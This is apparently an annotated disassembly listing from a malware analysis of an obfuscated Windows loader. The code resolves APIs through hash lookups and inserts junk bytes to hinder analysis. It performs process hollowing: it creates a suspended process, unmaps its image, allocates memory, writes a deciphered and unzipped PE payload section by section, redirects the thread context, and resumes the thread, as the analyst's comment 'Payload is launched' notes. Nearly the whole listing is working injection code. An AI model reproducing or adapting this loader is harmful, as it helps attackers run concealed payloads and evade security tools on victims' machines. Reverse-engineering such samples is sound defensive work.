seg000:000007CE 50                                push    eax             ; *Destination
seg000:000007CF BB E8 00 00 00                    mov     ebx, 0E8h ; 'Þ'
seg000:000007D4 EB 03                             jmp     short loc_7D9
seg000:000007D6 88 68 10                          mov     [eax+10h], ch
seg000:000007D9                   loc_7D9:                                ; ...
seg000:000007D9 68 A2 03 1E EA                    push    0EA1E03A2h      ; 'Ntdll.dll'
seg000:000007DE E8 36 F8 FF FF                    call    getModuleHandle
seg000:000007E3 68 FE 6A 48 55                    push    55486AFEh       ; RtlZeroMemory
seg000:000007E8 50                                push    eax
seg000:000007E9 E8 1A F9 FF FF                    call    getAPIAddress
seg000:000007EE FF D0                             call    eax
seg000:000007F0 89 FB                             mov     ebx, edi
seg000:000007F2 6A 44                             push    44h ; 'D'
seg000:000007F4 F7 D3                             not     ebx
seg000:000007F6 8D 85 60 FC FF FF                 lea     eax, [ebp-3A0h]
seg000:000007FC 42                                inc     edx
seg000:000007FD 50                                push    eax
seg000:000007FE 69 D2 E3 00 00 00                 imul    edx, 0E3h
seg000:00000804 EB 02                             jmp     short loc_808
seg000:00000806 FC                                db 0FCh ; ³
seg000:00000807 13                                db 13h
seg000:00000808                   loc_808:                                ; ...
seg000:00000808 68 A2 03 1E EA                    push    0EA1E03A2h      ; 'Ntdll.dll'
seg000:0000080D E8 07 F8 FF FF                    call    getModuleHandle
seg000:00000812 68 FE 6A 48 55                    push    55486AFEh       ; RtlZeroMemory
seg000:00000817 50                                push    eax
seg000:00000818 E8 EB F8 FF FF                    call    getAPIAddress
seg000:0000081D FF D0                             call    eax
seg000:0000081F
seg000:0000081F                                   ; Interesting point : propagating command line args to the payload !
seg000:0000081F B9 35 00 00 00                    mov     ecx, 35h ; '5'
seg000:00000824 EB 01                             jmp     short loc_827
seg000:00000826 03                                db 3
seg000:00000827                   loc_827:                                ; ...
seg000:00000827 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:0000082C E8 E8 F7 FF FF                    call    getModuleHandle
seg000:00000831 68 7C 00 E5 71                    push    71E5007Ch       ; GetCommandLineW
seg000:00000836 50                                push    eax
seg000:00000837 E8 CC F8 FF FF                    call    getAPIAddress
seg000:0000083C FF D0                             call    eax             ; ******* GetCommandeLineW (); *******
seg000:0000083E 0F AF F1                          imul    esi, ecx
seg000:00000841 89 C1                             mov     ecx, eax
seg000:00000843 21 FB                             and     ebx, edi
seg000:00000845 EB 02                             jmp     short loc_849
seg000:00000847 D0 F6                             sal     dh, 1
seg000:00000849                   loc_849:                                ; ...
seg000:00000849 C7 85 60 FC FF FF+                mov     dword ptr [ebp-3A0h], 44h ; 'D'
seg000:00000853 19 CA                             sbb     edx, ecx
seg000:00000855 8D 85 B0 FC FF FF                 lea     eax, [ebp-350h]
seg000:0000085B F7 DF                             neg     edi
seg000:0000085D 50                                push    eax             ; lpProcessInformation
seg000:0000085E 0F AF DE                          imul    ebx, esi
seg000:00000861 8D 85 60 FC FF FF                 lea     eax, [ebp-3A0h]
seg000:00000867 81 DA F4 00 00 00                 sbb     edx, 0F4h ; '¶'
seg000:0000086D 50                                push    eax             ; lpStartupInfo
seg000:0000086E 23 95 14 F8 FF FF                 and     edx, [ebp-7ECh]
seg000:00000874 6A 00                             push    0               ; lpCurrentDirectory
seg000:00000876 29 F8                             sub     eax, edi
seg000:00000878 6A 00                             push    0               ; lpEnvironment
seg000:0000087A 0F AF F0                          imul    esi, eax
seg000:0000087D 6A 04                             push    4               ; dwCreationFlags = CREATE_SUSPENDED
seg000:0000087F 89 DF                             mov     edi, ebx
seg000:00000881 6A 00                             push    0               ; bInheritHandles
seg000:00000883 2B B5 F8 F7 FF FF                 sub     esi, [ebp-808h]
seg000:00000889 6A 00                             push    0               ; lpThreadAttributes
seg000:0000088B 81 EF FB 00 00 00                 sub     edi, 0FBh ; '¹'
seg000:00000891 EB 03                             jmp     short loc_896
seg000:00000893 8F C1                             pop     ecx
seg000:00000895 F1                                icebp
seg000:00000896                   loc_896:                                ; ...
seg000:00000896 6A 00                             push    0               ; lpProcessAttributes
seg000:00000898 19 F3                             sbb     ebx, esi
seg000:0000089A EB 03                             jmp     short loc_89F
seg000:0000089C E7 38 AB                          db 0E7h, 38h, 0ABh
seg000:0000089F                   loc_89F:                                ; ...
seg000:0000089F 51                                push    ecx             ; lpCommandLine
seg000:000008A0 31 85 28 FC FF FF                 xor     [ebp-3D8h], eax
seg000:000008A6 6A 00                             push    0               ; lpApplicationName
seg000:000008A8 09 85 48 FC FF FF                 or      [ebp-3B8h], eax
seg000:000008AE 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:000008B3 E8 61 F7 FF FF                    call    getModuleHandle
seg000:000008B8 68 3F 00 73 19                    push    1973003Fh       ; CreateProcessW
seg000:000008BD 50                                push    eax
seg000:000008BE E8 45 F8 FF FF                    call    getAPIAddress
seg000:000008C3 FF D0                             call    eax             ; ******* CreateProcessW () *******
seg000:000008C5 13 7D B0                          adc     edi, [ebp-50h]
seg000:000008C8 8B 85 4C FC FF FF                 mov     eax, [ebp-3B4h] ; PE payload deciphered and unzipped
seg000:000008CE 87 95 F8 F7 FF FF                 xchg    edx, [ebp-808h]
seg000:000008D4 EB 01                             jmp     short loc_8D7
seg000:000008D6 99                                cdq
seg000:000008D7                   loc_8D7:                                ; ...
seg000:000008D7 03 40 3C                          add     eax, [eax+3Ch]  ; EAX -> PE Header
seg000:000008DA 4A                                dec     edx
seg000:000008DB 89 45 B4                          mov     [ebp-4Ch], eax
seg000:000008DE F7 D1                             not     ecx
seg000:000008E0 8B                                db  8Bh ; ï
seg000:000008E1 40                                inc     eax
seg000:000008E2 34 C7                             xor     al, 0C7h
seg000:000008E4 45                                inc     ebp
seg000:000008E5 AC                                lodsb
seg000:000008E6 01 00                             add     [eax], eax
seg000:000008E8 00                                db    0                 ; add byte ptr ds:[eax],al
seg000:000008E9 00                                db    0
seg000:000008EA 89 45 A4                          mov     [ebp-5Ch], eax
seg000:000008ED 87 FB                             xchg    edi, ebx
seg000:000008EF FF 75 A4                          push    dword ptr [ebp-5Ch] ; BaseAddress
seg000:000008F2 F7 D1                             not     ecx
seg000:000008F4 FF B5 B0 FC FF FF                 push    dword ptr [ebp-350h] ; ProcessHandle
seg000:000008FA 89 F0                             mov     eax, esi
seg000:000008FC 68 A2 03 1E EA                    push    0EA1E03A2h      ; 'Ntdll.dll'
seg000:00000901 E8 13 F7 FF FF                    call    getModuleHandle
seg000:00000906 68 6C 23 51 5D                    push    5D51236Ch       ; ZwUnmapViewOfSection
seg000:0000090B 50                                push    eax
seg000:0000090C E8 F7 F7 FF FF                    call    getAPIAddress
seg000:00000911 FF D0                             call    eax             ; ******* ZwUnmapViewOfSection () *******
seg000:00000913 29 C7                             sub     edi, eax
seg000:00000915 EB 02                             jmp     short loc_919
seg000:00000917 63                                db  63h ; c
seg000:00000918 D9                                db 0D9h ; +
seg000:00000919                   loc_919:                                ; ...
seg000:00000919 6A 40                             push    40h ; '@'
seg000:0000091B F7 D1                             not     ecx
seg000:0000091D EB 03                             jmp     short loc_922
seg000:0000091F 4B                                db  4Bh ; K
seg000:00000920 E7                                db 0E7h ; þ
seg000:00000921 3D                                db  3Dh ; =
seg000:00000922                   loc_922:                                ; ...
seg000:00000922 68 00 30 00 00                    push    3000h
seg000:00000927 C7 85 DC F7 FF FF+                mov     dword ptr [ebp-824h], 0BEh ; '¥'
seg000:00000931 EB 01                             jmp     short loc_934
seg000:00000933 2C                                db  2Ch ; ,
seg000:00000934                   loc_934:                                ; ...
seg000:00000934 8B 45 B4                          mov     eax, [ebp-4Ch]
seg000:00000937 87 95 DC F7 FF FF                 xchg    edx, [ebp-824h]
seg000:0000093D FF 70 50                          push    dword ptr [eax+50h]
seg000:00000940 83 E6 46                          and     esi, 46h
seg000:00000943 EB 01                             jmp     short loc_946
seg000:00000945 D0                                db 0D0h ; ð
seg000:00000946                   loc_946:                                ; ...
seg000:00000946 FF 75 A4                          push    dword ptr [ebp-5Ch]
seg000:00000949 6B F6 37                          imul    esi, 37h
seg000:0000094C FF B5 B0 FC FF FF                 push    dword ptr [ebp-350h]
seg000:00000952 4B                                dec     ebx
seg000:00000953 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:00000958 E8 BC F6 FF FF                    call    getModuleHandle
seg000:0000095D 68 3F 66 52 64                    push    6452663Fh       ; VirtualAllocEx
seg000:00000962 50                                push    eax
seg000:00000963 E8 A0 F7 FF FF                    call    getAPIAddress
seg000:00000968 FF D0                             call    eax             ; ******* VirtualAllocEx (); *******
seg000:0000096A 13 B5 F4 F7 FF FF                 adc     esi, [ebp-80Ch]
seg000:00000970 EB 03                             jmp     short loc_975
seg000:00000972 B0                                db 0B0h ; ¦
seg000:00000973 C3                                db 0C3h ; +
seg000:00000974 8E                                db  8Eh ; Ä
seg000:00000975                   loc_975:                                ; ...
seg000:00000975 6A 00                             push    0
seg000:00000977 F7 DA                             neg     edx
seg000:00000979 EB 02                             jmp     short loc_97D
seg000:0000097B E8                                db 0E8h ; Þ
seg000:0000097C 65                                db  65h ; e
seg000:0000097D                   loc_97D:                                ; ...
seg000:0000097D 8B 45 B4                          mov     eax, [ebp-4Ch]
seg000:00000980 4F                                dec     edi
seg000:00000981 EB 01                             jmp     short loc_984
seg000:00000983 F2                                db 0F2h ; =
seg000:00000984                   loc_984:                                ; ...
seg000:00000984 FF 70 54                          push    dword ptr [eax+54h] ; lpBuffer
seg000:00000987 97                                xchg    eax, edi
seg000:00000988 FF B5 4C FC FF FF                 push    dword ptr [ebp-3B4h] ; lpBaseAddress
seg000:0000098E F7 DF                             neg     edi
seg000:00000990 FF 75 A4                          push    dword ptr [ebp-5Ch] ; hProcess
seg000:00000993 01 D2                             add     edx, edx
seg000:00000995 FF B5 B0 FC FF FF                 push    dword ptr [ebp-350h]
seg000:0000099B 29 C0                             sub     eax, eax
seg000:0000099D 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:000009A2 E8 72 F6 FF FF                    call    getModuleHandle
seg000:000009A7 68 1E 74 F0 00                    push    0F0741Eh        ; WriteProcessMemory
seg000:000009AC 50                                push    eax
seg000:000009AD E8 56 F7 FF FF                    call    getAPIAddress
seg000:000009B2 FF D0                             call    eax             ; ******* WriteProcessMemory (); *******
seg000:000009B4 F7 D3                             not     ebx
seg000:000009B6 EB 03                             jmp     short loc_9BB
seg000:000009B8 CB                                db 0CBh ; -
seg000:000009B9 6F                                db  6Fh ; o
seg000:000009BA D7                                db 0D7h ; Î
seg000:000009BB                   loc_9BB:                                ; ...
seg000:000009BB 83 F8 01                          cmp     eax, 1
seg000:000009BE 74 51                             jz      short memoryOK
seg000:000009C0
seg000:000009C0                   ; ---------------------------------------------------------------------
seg000:000009C0                   ;                     If there is a problem, terminate...
seg000:000009C0                   ; ---------------------------------------------------------------------
seg000:000009C0
seg000:000009C0 01 DE                             add     esi, ebx
seg000:000009C2 6A 64                             push    64h ; 'd'
seg000:000009C4 46                                inc     esi
seg000:000009C5 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:000009CA E8 4A F6 FF FF                    call    getModuleHandle
seg000:000009CF 68 42 AD 14 BB                    push    0BB14AD42h      ; Sleep
seg000:000009D4 50                                push    eax
seg000:000009D5 E8 2E F7 FF FF                    call    getAPIAddress
seg000:000009DA FF D0                             call    eax             ; ******* Sleep (); ******
seg000:000009DC 29 FA                             sub     edx, edi
seg000:000009DE EB 03                             jmp     short loc_9E3
seg000:000009E0 C5                                db 0C5h ; +
seg000:000009E1 24                                db  24h ; $
seg000:000009E2 43                                db  43h ; C
seg000:000009E3                   loc_9E3:                                ; ...
seg000:000009E3 6A 00                             push    0
seg000:000009E5 41                                inc     ecx
seg000:000009E6 EB 03                             jmp     short loc_9EB
seg000:000009E8 7B                                db  7Bh ; {
seg000:000009E9 40                                db  40h ; @
seg000:000009EA B0                                db 0B0h ; ¦
seg000:000009EB                   loc_9EB:                                ; ...
seg000:000009EB FF B5 B0 FC FF FF                 push    dword ptr [ebp-350h]
seg000:000009F1 11 F9                             adc     ecx, edi
seg000:000009F3 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:000009F8 E8 1C F6 FF FF                    call    getModuleHandle
seg000:000009FD 68 33 EF BE E3                    push    0E3BEEF33h      ; TerminateProcess
seg000:00000A02 50                                push    eax
seg000:00000A03 E8 00 F7 FF FF                    call    getAPIAddress
seg000:00000A08 FF D0                             call    eax
seg000:00000A0A F7 D6                             not     esi
seg000:00000A0C E9 16 FE FF FF                    jmp     loc_827
seg000:00000A11
seg000:00000A11                   ; ---------------------------------------------------------------------
seg000:00000A11                   ;                         No problem, continue...
seg000:00000A11                   ; ---------------------------------------------------------------------
seg000:00000A11
seg000:00000A11                   memoryOK:                               ; ...
seg000:00000A11 F7 D9                             neg     ecx
seg000:00000A13 8B 45 B4                          mov     eax, [ebp-4Ch]
seg000:00000A16 F7 D1                             not     ecx
seg000:00000A18 EB 03                             jmp     short loc_A1D
seg000:00000A1A FB                                db 0FBh ; ¹
seg000:00000A1B 55                                db  55h ; U
seg000:00000A1C 02                                db    2
seg000:00000A1D                   loc_A1D:                                ; ...
seg000:00000A1D 0F B7 48 06                       movzx   ecx, word ptr [eax+6]
seg000:00000A21 F7 DB                             neg     ebx
seg000:00000A23 8D B0 F8 00 00 00                 lea     esi, [eax+0F8h]
seg000:00000A29 F7 D2                             not     edx
seg000:00000A2B                   copy_loop:                              ; ...
seg000:00000A2B 81 F3 D7 00 00 00                 xor     ebx, 0D7h
seg000:00000A31 51                                push    ecx
seg000:00000A32 F7 D2                             not     edx
seg000:00000A34 8B 85 4C FC FF FF                 mov     eax, [ebp-3B4h]
seg000:00000A3A 23 95 40 FC FF FF                 and     edx, [ebp-3C0h]
seg000:00000A40 EB 02                             jmp     short loc_A44
seg000:00000A42 D8                                db 0D8h ; Ï
seg000:00000A43 48                                db  48h ; H
seg000:00000A44                   loc_A44:                                ; ...
seg000:00000A44 03 46 14                          add     eax, [esi+14h]
seg000:00000A47 21 D9                             and     ecx, ebx
seg000:00000A49 8B 4D A4                          mov     ecx, [ebp-5Ch]
seg000:00000A4C 47                                inc     edi
seg000:00000A4D EB 01                             jmp     short loc_A50
seg000:00000A4F FD                                db 0FDh ; ²
seg000:00000A50                   loc_A50:                                ; ...
seg000:00000A50 03 4E 0C                          add     ecx, [esi+0Ch]
seg000:00000A53 11 F7                             adc     edi, esi
seg000:00000A55 EB 02                             jmp     short loc_A59
seg000:00000A57 45                                db  45h ; E
seg000:00000A58 07                                db    7
seg000:00000A59                   loc_A59:                                ; ...
seg000:00000A59 21 C3                             and     ebx, eax
seg000:00000A5B EB 03                             jmp     short loc_A60
seg000:00000A5D D3                                db 0D3h ; Ë
seg000:00000A5E CD                                db 0CDh ; -
seg000:00000A5F 2F                                db  2Fh ; /
seg000:00000A60                   loc_A60:                                ; ...
seg000:00000A60 6A 00                             push    0               ; *lpNumberOfBytesWritten
seg000:00000A62 0F AF D0                          imul    edx, eax
seg000:00000A65 EB 01                             jmp     short loc_A68
seg000:00000A67 94                                db  94h ; ö
seg000:00000A68                   loc_A68:                                ; ...
seg000:00000A68 FF 76 10                          push    dword ptr [esi+10h] ; nSize
seg000:00000A6B 29 C7                             sub     edi, eax
seg000:00000A6D EB 02                             jmp     short loc_A71
seg000:00000A6F 2A                                db  2Ah ; *
seg000:00000A70 8F                                db  8Fh ; Å
seg000:00000A71                   loc_A71:                                ; ...
seg000:00000A71 50                                push    eax             ; lpBuffer
seg000:00000A72 33 9D 14 F8 FF FF                 xor     ebx, [ebp-7ECh] ; lpBaseAddress
seg000:00000A78 51                                push    ecx
seg000:00000A79 F7 D1                             not     ecx
seg000:00000A7B FF B5 B0 FC FF FF                 push    dword ptr [ebp-350h] ; hProcess
seg000:00000A81 4B                                dec     ebx
seg000:00000A82 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:00000A87 E8 8D F5 FF FF                    call    getModuleHandle
seg000:00000A8C 68 1E 74 F0 00                    push    0F0741Eh        ; WriteProcessMemory()
seg000:00000A91 50                                push    eax
seg000:00000A92 E8 71 F6 FF FF                    call    getAPIAddress
seg000:00000A97 FF D0                             call    eax             ; ******* WriteProcessMemory (); ******
seg000:00000A99 41                                inc     ecx
seg000:00000A9A 83 C6 28                          add     esi, 28h ; '('
seg000:00000A9D 01 DA                             add     edx, ebx
seg000:00000A9F 59                                pop     ecx
seg000:00000AA0 1B 85 C0 FC FF FF                 sbb     eax, [ebp-340h]
seg000:00000AA6 49                                dec     ecx
seg000:00000AA7 75 82                             jnz     short copy_loop
seg000:00000AA9                   ;
seg000:00000AA9                   ;
seg000:00000AA9                   ;
seg000:00000AA9                   ;
seg000:00000AA9
seg000:00000AA9 23 95 C0 FC FF FF                 and     edx, [ebp-340h]
seg000:00000AAF C7 85 CC FC FF FF+                mov     dword ptr [ebp-334h], 10007h
seg000:00000AB9 31 F0                             xor     eax, esi
seg000:00000ABB 8D 85 CC FC FF FF                 lea     eax, [ebp-334h] ; -1
seg000:00000AC1 F7 D7                             not     edi
seg000:00000AC3 EB 02                             jmp     short loc_AC7
seg000:00000AC5 BE                                db 0BEh ; ¥
seg000:00000AC6 22                                db  22h ; "
seg000:00000AC7                   loc_AC7:                                ; ...
seg000:00000AC7 50                                push    eax             ; lpContext
seg000:00000AC8 F7 D2                             not     edx
seg000:00000ACA FF B5 B4 FC FF FF                 push    dword ptr [ebp-34Ch] ; hThread
seg000:00000AD0 89 F1                             mov     ecx, esi
seg000:00000AD2 EB 02                             jmp     short loc_AD6
seg000:00000AD4 53                                db  53h ; S
seg000:00000AD5 9C                                db  9Ch ; £
seg000:00000AD6                   loc_AD6:                                ; ...
seg000:00000AD6 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:00000ADB E8 39 F5 FF FF                    call    getModuleHandle
seg000:00000AE0 68 55 63 55 89                    push    89556355h       ; GetThreadContext
seg000:00000AE5 50                                push    eax
seg000:00000AE6 E8 1D F6 FF FF                    call    getAPIAddress
seg000:00000AEB FF D0                             call    eax             ; ******* GetThreadContext (); *******
seg000:00000AED 83 C7 5E                          add     edi, 5Eh ; '^'
seg000:00000AF0 8B 85 70 FD FF FF                 mov     eax, [ebp-290h]
seg000:00000AF6 43                                inc     ebx
seg000:00000AF7 83 C0 08                          add     eax, 8
seg000:00000AFA F7 D1                             not     ecx
seg000:00000AFC 6A 00                             push    0
seg000:00000AFE 0F AF D6                          imul    edx, esi
seg000:00000B01 6A 04                             push    4
seg000:00000B03 87 DF                             xchg    ebx, edi
seg000:00000B05 8D 4D A4                          lea     ecx, [ebp-5Ch]
seg000:00000B08 F7 D6                             not     esi
seg000:00000B0A 51                                push    ecx
seg000:00000B0B 11 CA                             adc     edx, ecx
seg000:00000B0D 50                                push    eax
seg000:00000B0E 21 C9                             and     ecx, ecx
seg000:00000B10 FF B5 B0 FC FF FF                 push    dword ptr [ebp-350h]
seg000:00000B16 33 5D C0                          xor     ebx, [ebp-40h]
seg000:00000B19 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:00000B1E E8 F6 F4 FF FF                    call    getModuleHandle
seg000:00000B23 68 1E 74 F0 00                    push    0F0741Eh        ; WriteProcessMemory()
seg000:00000B28 50                                push    eax
seg000:00000B29 E8 DA F5 FF FF                    call    getAPIAddress
seg000:00000B2E FF D0                             call    eax             ; ******* WriteProcessMemory (); *******
seg000:00000B30 43                                inc     ebx
seg000:00000B31 8B 45 B4                          mov     eax, [ebp-4Ch]
seg000:00000B34 11 C9                             adc     ecx, ecx
seg000:00000B36 8B 40 28                          mov     eax, [eax+28h]
seg000:00000B39 F7 D7                             not     edi
seg000:00000B3B EB 01                             jmp     short loc_B3E
seg000:00000B3D 81                                db  81h ; ü
seg000:00000B3E                   loc_B3E:                                ; ...
seg000:00000B3E 03 45 A4                          add     eax, [ebp-5Ch]
seg000:00000B41 0F AF F8                          imul    edi, eax
seg000:00000B44 EB 01                             jmp     short loc_B47
seg000:00000B46 49                                db  49h ; I
seg000:00000B47                   loc_B47:                                ; ...
seg000:00000B47 89 85 84 FD FF FF                 mov     [ebp-27Ch], eax
seg000:00000B4D 83 75 A8 10                       xor     dword ptr [ebp-58h], 10h
seg000:00000B51 8D 85 CC FC FF FF                 lea     eax, [ebp-334h]
seg000:00000B57 01 F2                             add     edx, esi
seg000:00000B59 50                                push    eax
seg000:00000B5A 4F                                dec     edi
seg000:00000B5B FF B5 B4 FC FF FF                 push    dword ptr [ebp-34Ch]
seg000:00000B61 09 D9                             or      ecx, ebx
seg000:00000B63 EB 03                             jmp     short loc_B68
seg000:00000B65 0D                                db  0Dh
seg000:00000B66 16                                db  16h
seg000:00000B67 7F                                db  7Fh ; 
seg000:00000B68                   loc_B68:                                ; ...
seg000:00000B68 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:00000B6D E8 A7 F4 FF FF                    call    getModuleHandle
seg000:00000B72 68 55 C3 55 89                    push    8955C355h       ; SetThreadContext
seg000:00000B77 50                                push    eax
seg000:00000B78 E8 8B F5 FF FF                    call    getAPIAddress
seg000:00000B7D FF D0                             call    eax             ; ******* SetThreadContext (); *******
seg000:00000B7F 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:00000B84 81 DB D1 00 00 00                 sbb     ebx, 0D1h ; 'Ð'
seg000:00000B8A E8 8A F4 FF FF                    call    getModuleHandle
seg000:00000B8F 8B 9D 0C F8 FF FF                 mov     ebx, [ebp-7F4h]
seg000:00000B95 68 83 62 4C CE                    push    0CE4C6283h      ; ExitProcess
seg000:00000B9A 49                                dec     ecx
seg000:00000B9B EB 01                             jmp     short loc_B9E
seg000:00000B9D 6D                                db  6Dh ; m
seg000:00000B9E                   loc_B9E:                                ; ...
seg000:00000B9E 50                                push    eax
seg000:00000B9F 01 85 34 FC FF FF                 add     [ebp-3CCh], eax
seg000:00000BA5 E8 5E F5 FF FF                    call    getAPIAddress
seg000:00000BAA 19 F9                             sbb     ecx, edi
seg000:00000BAC 50                                push    eax
seg000:00000BAD 21 FE                             and     esi, edi
seg000:00000BAF 89 E1                             mov     ecx, esp
seg000:00000BB1 83 F6 3B                          xor     esi, 3Bh
seg000:00000BB4 EB 03                             jmp     short loc_BB9
seg000:00000BB6 66                                db  66h ; f
seg000:00000BB7 02                                db    2
seg000:00000BB8 05                                db    5
seg000:00000BB9                   loc_BB9:                                ; ...
seg000:00000BB9 8B 85 90 FD FF FF                 mov     eax, [ebp-270h]
seg000:00000BBF 4E                                dec     esi
seg000:00000BC0 6A 00                             push    0
seg000:00000BC2 4A                                dec     edx
seg000:00000BC3 EB 02                             jmp     short loc_BC7
seg000:00000BC5 B7                                db 0B7h ; À
seg000:00000BC6 64                                db  64h ; d
seg000:00000BC7                   loc_BC7:                                ; ...
seg000:00000BC7 6A 04                             push    4
seg000:00000BC9 81 D6 91 00 00 00                 adc     esi, 91h ; 'æ'
seg000:00000BCF EB 02                             jmp     short loc_BD3
seg000:00000BD1 EC                                db 0ECh ; ý
seg000:00000BD2 EE                                db 0EEh ; ¯
seg000:00000BD3                   loc_BD3:                                ; ...
seg000:00000BD3 51                                push    ecx
seg000:00000BD4 21 95 5C FC FF FF                 and     [ebp-3A4h], edx
seg000:00000BDA 50                                push    eax
seg000:00000BDB 81 C9 B2 00 00 00                 or      ecx, 0B2h
seg000:00000BE1 FF B5 B0 FC FF FF                 push    dword ptr [ebp-350h]
seg000:00000BE7 1B 45 98                          sbb     eax, [ebp-68h]
seg000:00000BEA EB 02                             jmp     short loc_BEE
seg000:00000BEC D9                                db 0D9h ; +
seg000:00000BED D5                                db 0D5h ; i
seg000:00000BEE                   loc_BEE:                                ; ...
seg000:00000BEE 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:00000BF3 E8 21 F4 FF FF                    call    getModuleHandle
seg000:00000BF8 68 1E 74 F0 00                    push    0F0741Eh        ; WriteProcessMemory()
seg000:00000BFD 50                                push    eax
seg000:00000BFE E8 05 F5 FF FF                    call    getAPIAddress
seg000:00000C03 FF D0                             call    eax
seg000:00000C05 F7 DA                             neg     edx
seg000:00000C07 58                                pop     eax
seg000:00000C08 81 65 A0 D0 00 00+                and     dword ptr [ebp-60h], 0D0h
seg000:00000C0F EB 01                             jmp     short loc_C12
seg000:00000C11 E8                                db 0E8h ; Þ
seg000:00000C12                   loc_C12:                                ; ...
seg000:00000C12 F7 DE                             neg     esi
seg000:00000C14 FF B5 B4 FC FF FF                 push    dword ptr [ebp-34Ch]
seg000:00000C1A 23 8D 48 FC FF FF                 and     ecx, [ebp-3B8h]
seg000:00000C20 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:00000C25 E8 EF F3 FF FF                    call    getModuleHandle
seg000:00000C2A 68 AF A6 B5 34                    push    34B5A6AFh       ; ResumeThread
seg000:00000C2F 50                                push    eax
seg000:00000C30 E8 D3 F4 FF FF                    call    getAPIAddress
seg000:00000C35 FF D0                             call    eax             ; ******* ResumeThread (); *******
seg000:00000C37
seg000:00000C37
seg000:00000C37                   ; ==============> Ok, Payload is launched !!!!!
seg000:00000C37
seg000:00000C37
seg000:00000C37 F7 D2                             not     edx
seg000:00000C39 68 00 40 00 00                    push    4000h
seg000:00000C3E 48                                dec     eax
seg000:00000C3F FF 75 F4                          push    dword ptr [ebp-0Ch]
seg000:00000C42 89 55 C0                          mov     [ebp-40h], edx
seg000:00000C45 FF B5 4C FC FF FF                 push    dword ptr [ebp-3B4h]
seg000:00000C4B 81 D3 F7 00 00 00                 adc     ebx, 0F7h ; '¸'
seg000:00000C51 EB 01                             jmp     short loc_C54
seg000:00000C53 7D                                db  7Dh ; }
seg000:00000C54                   loc_C54:                                ; ...
seg000:00000C54 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:00000C59 E8 BB F3 FF FF                    call    getModuleHandle
seg000:00000C5E 68 54 87 30 A8                    push    0A8308754h      ; VirtualFree
seg000:00000C63 50                                push    eax
seg000:00000C64 E8 9F F4 FF FF                    call    getAPIAddress
seg000:00000C69 FF D0                             call    eax
seg000:00000C6B                   loc_C6B:                                ; ...
seg000:00000C6B 1B 4D E4                          sbb     ecx, [ebp-1Ch]
seg000:00000C6E EB 02                             jmp     short loc_C72
seg000:00000C70 49                                db  49h ; I
seg000:00000C71 14                                db 14h
seg000:00000C72                   loc_C72:                                ; ...
seg000:00000C72 6A 00                             push    0
seg000:00000C74 F7 D6                             not     esi
seg000:00000C76 68 45 98 BB F3                    push    0F3BB9845h      ; 'Kernel32.dll'
seg000:00000C7B E8 99 F3 FF FF                    call    getModuleHandle
seg000:00000C80 68 83 62 4C CE                    push    0CE4C6283h      ; ExitProcess
seg000:00000C85 50                                push    eax
seg000:00000C86 E8 7D F4 FF FF                    call    getAPIAddress
seg000:00000C8B FF D0                             call    eax
seg000:00000C8D 31 FB                             xor     ebx, edi
seg000:00000C8F C9                                leave
seg000:00000C90 C3                                retn
seg000:00000C90                   seg000          ends
seg000:00000C90                                   end